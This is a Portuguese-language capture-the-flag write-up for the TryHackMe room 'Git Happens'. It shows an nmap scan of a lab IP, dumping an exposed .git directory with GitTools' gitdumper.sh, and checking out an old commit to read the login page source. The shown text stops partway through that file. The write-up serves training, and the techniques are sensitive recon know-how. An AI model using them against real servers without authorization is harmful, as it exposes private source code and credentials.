Git Happens
Acho que essa máquina deveria ser classificada como fácil em vez de média, mas ok. Como o nome sugere, estamos lidando com coisas do git aqui.
Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy! (TryHackMe | Git Happens)
Começo procurando uma página da web.
Ok, haverá algo para brincar enquanto a enumeração estiver em andamento.
w1zard in try-hack-me/rooms/githappens
sudo nmap -sC -sV -T4 -oN nmap-githappens.txt 10.10.4.93
[sudo] password for w1zard:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 15:06 -03
Nmap scan report for 10.10.4.93
Host is up (0.23s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
| http-git:
| 10.10.4.93:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.11 seconds
O nmap foi bem rápido e encontrou um repositório git.
Encontrei duas ferramentas diferentes para fazer o dump de repositórios git e vou usar o GitTools/Dumper. Depois de dumpar o conteúdo, verifico as entradas de log.
w1zard in try-hack-me/rooms/githappens
bash /opt/GitTools/Dumper/gitdumper.sh http://10.10.4.93/.git/ ./githappens
w1zard in githappens on master [✘]
git log
Depois de encontrar o commit certo…
commit 395e087334d613d5e423cdf8f7be27196a360459 (HEAD)
...
Reflog message: checkout: moving from master to 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <[email protected]>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
… o checkout e então…
w1zard in githappens on master [✘] took 17s
git checkout 395e087334d613d5e423cdf8f7be27196a360459
D README.md
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.
...
HEAD is now at 395e087 Made the login page, boss!
… verificando os arquivos para obter o lucro:
w1zard in githappens on v1.0~7 [✘]
ls
css dashboard.html index.html
w1zard in githappens on v1.0~7 [✘]
cat index.html
<!DOCTYPE html>
<html lang="en">
<head>
...